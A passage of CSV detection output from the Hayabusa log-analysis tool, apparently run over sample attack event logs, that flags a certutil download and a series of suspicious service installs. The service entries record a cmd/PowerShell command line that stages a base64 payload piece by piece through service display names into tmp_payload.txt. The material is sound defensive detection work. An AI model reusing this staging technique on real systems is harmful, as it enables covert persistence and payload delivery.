0x5ba37",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx +2021-11-02 14:15:24.567 +00:00,fs03vuln.offsec.lan,4688,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_builtin/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx +2021-11-03 08:15:14.789 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:14.789 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:14.789 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:16.295 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:16.295 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:16.295 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:17.775 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:17.775 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:17.775 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:19.262 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:19.262 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:19.262 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:20.742 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:20.742 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:20.742 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:22.220 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:22.220 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:22.220 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:23.679 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:23.679 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:23.679 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:25.150 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:25.150 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:25.150 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:26.606 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:26.606 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:26.606 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:28.059 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:28.059 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:28.059 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:29.523 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:29.523 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:29.523 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:30.978 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:30.978 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:30.978 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:32.440 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select 